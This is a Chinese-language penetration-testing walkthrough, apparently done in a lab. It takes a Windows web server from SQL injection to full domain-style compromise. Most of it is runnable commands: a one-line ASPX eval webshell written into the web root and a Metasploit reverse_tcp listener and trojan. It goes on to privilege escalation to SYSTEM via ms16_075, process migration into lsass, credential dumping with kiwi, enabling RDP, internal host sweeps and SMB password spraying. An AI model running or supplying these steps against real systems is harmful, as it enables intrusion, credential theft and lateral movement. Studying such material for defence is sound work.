1.獲取sql注入,通過sql注入,--is-dba發現為sa權限
2.獲取os-shell,使用echo向網站寫入webshell(需要知道網站絕對路徑)
* 可先在本地測試命令是否可以正常執行,然后在將命令使用在實際環境中
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > C:\\vip888\\web\\Admin\\123.aspx
成功寫入webshell
3.使用蟻劍連接(pass)
4.上傳msf遠控木馬
5.msf開啟監聽 (0.0.0.0表示監聽所有能監聽到的host)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport <ip>
set lhost <host>
6.在虛擬終端中運行上傳的文件,msf端接收到傳來的描meterpreter會話
7.查看權限為iis權限,使用msf提權
將會話切換到后台運行 查看給出的session,並給出當前會話id
background
選擇local_exploit_suggester本地提權輔助模塊,將上一步的會話id放入並運行,查看可使用的提權模塊
use post/multi/recon/local_exploit_suggester
set session 4
run
選擇可能存在漏洞的模塊進行提權(可能會存在一定的誤報),option查看需要填寫的參數,填入剛剛的sessionid,在payload中選擇反彈的ip,執行run,服務器收到新的meterperter會話
use exploit/windows/local/ms16_075_reflection_juicy
options
set session <sessionid>
set lhost <host>
set lport <port>
run
漏洞利用成功,getuid查看權限為system權限
getuid
8.進程遷移
getpid查看當前進程,ps查看全部進程,使用migrate <進程號>遷移進程,最后getpid查看進程是否遷移成功(這里的進程遷移選擇最好選擇一個system權限開啟的系統進程,選項盡量為svchost.exe進程和lsass.exe)
getpid
ps
migrate <pid>
getpid
進程遷移完成,getpid查看進程為448
9.讀取Windows密碼
加載kiwi讀取windows密碼(舊版msf是load mimikatz)
load kiwi
creds_all
*這里我發現mimikatz已經換成了kiwi,並且meterpreter下命令也已經更換,這里我找了新的命令供大家參考https://www.cnblogs.com/KHZ521/p/14476955.html
10.開啟遠程桌面
(這里的情況只適合在內網中使用,因為在公網一般來說都會有規則的准入,即使開啟了3389端口,也無法直接進行遠程連接,不過可通過代理或流量轉發的方式將流量代理到本地進行遠程連接)
run post/windows/manage/enable_rdp
11.在本地使用Windows就可以連接了
Windows鍵+r打開運行,輸入mstsc打開遠程連接
輸入ip以及剛剛獲得的賬號和密碼,遠程連接即可
連接成功
內網探測
ping探測內網可連通並存活主機(這里我192.168.233.137主機開啟了防火牆,ping探測失敗了)
for /l %i in (1,1,255) do @ ping 192.168.233.%i -w 1 -n 1 | find /i "ttl="
get_local_subnets查看當前網段
run get_local_subnets
autoroute將路由添加到本地
run autoroute -s 192.168.233.0/24
(run post/multi/manage/autoroute)可自動添加路由到本地,上面兩步已被此方法代替
批量探測開放的3389端口,發現192.168.233.137開放了3389端口
use scanner/rdp/rdp_scanner
set rhosts 192.168.233.0/24
run
使用獲得的口令撞庫(rhosts可以是多個IP地址)
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.233.1/24
set SMBUser administrator
set SMBPass Admin123..
run
